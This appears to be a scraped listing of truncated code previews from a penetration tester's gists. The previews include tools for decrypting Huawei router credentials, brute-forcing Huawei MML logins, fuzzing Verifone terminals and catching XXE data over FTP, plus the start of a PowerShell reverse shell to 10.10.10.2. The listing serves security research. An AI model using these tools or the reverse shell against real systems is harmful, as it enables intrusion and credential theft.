This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
""" | |
Simple tool to extract local users and passwords from most Huawei routers/firewalls config files. | |
Will extract plain-text passwords and crypted credentials. Huawei config files use DES encryption with | |
a known key. Using this information, the script will decrypt credentials found in the config file. | |
Author: Etienne Stalmans (etienne@sensepost.com) | |
Version: 1.0 (12/01/2014) | |
""" | |
from Crypto.Cipher import DES |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
""" | |
Brute-force tool to find the username/password for MML on a Huawei device. | |
Author: Etienne Stalmans (etienne@sensepost.com) | |
Version: 1.0 (14/01/2014) | |
""" | |
import sys | |
import telnetlib |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/env/python | |
''' | |
Script for fuzzing verifone terminal/pos devices. This is a bad reverse-engineer and implementation of the official protocol: http://web.archive.org/web/20120603221525/http://www.verifone.com/PDF/guides/tcl_ref.pdf | |
Should work fine. Official docs were only found after the initial implementation. Not fully tested with CRC-16 checksum correctly implemented. | |
Author: etienne@sensepost.com | |
Version: 1.0 | |
License: GNU GENERAL PUBLIC LICENSE (GNU) Version 2 | |
''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$socket = new-object System.Net.Sockets.TcpClient('10.10.10.2', 8080); | |
if($socket -eq $null){exit 1} | |
$stream = $socket.GetStream(); | |
$writer = new-object System.IO.StreamWriter($stream); | |
$buffer = new-object System.Byte[] 1024; | |
$encoding = new-object System.Text.AsciiEncoding; | |
do{ | |
$writer.Write("> "); | |
$writer.Flush(); | |
$read = $null; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys | |
if len(sys.argv) < 2: | |
print "Enter IP address as first argument: python %s 127.0.0.1"%sys.argv[0] | |
sys.exit(1) | |
ip = sys.argv[1] | |
ips = ip.split('.') | |
iph = '0x{:02X}.0x{:02X}.0x{:02X}.0x{:02X}'.format(*map(int, ips)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/env/python | |
from __future__ import print_function | |
import socket | |
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
s.bind(('0.0.0.0',2121)) | |
s.listen(1) | |
print('XXE-FTP listening ') | |
conn,addr = s.accept() | |
print('Connected by %s',addr) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Create a sha256 hash (in uppercase) for each line in a file: | |
awk '{printf "%s - ",$1 }{"echo -n "$1"|sha256sum"|getline d;split(d,a,"-"); print toupper(a[1])}' notes.txt | |
For each line in the 'reps.txt' - create a random string of correct length and do a replace. | |
for i in `cat reps.txt`; do [16:28] | |
x=`cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w ${#i} | head -n 1`; echo $x; | |
sed -i "s/$i/$x/g" x6 ; | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /bin/bash | |
# PDF signing in Linux | |
# Author: etienne@sensepost.com | |
# Version: 1.0 16 October 2015 | |
# Requirements: xv, imagemagick | |
# Check if requirements are met: | |
if ! which convert 2>/dev/null; then | |
echo "ImageMagick not installed and is required" | |
exit 1 | |
fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
import sys | |
import binascii | |
tmp = binascii.a2b_base64(sys.argv[1]) | |
out = "" | |
for x in tmp: | |
out += chr(ord(x)^95) #xor with the underscore char (_) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM ubuntu:14.04 | |
MAINTAINER Etienne Stalmans, etienne@sensepost.com | |
RUN apt-get update && apt-get install -y \ | |
unzip \ | |
iptables | |
RUN apt-get install -y \ | |
build-essential \ |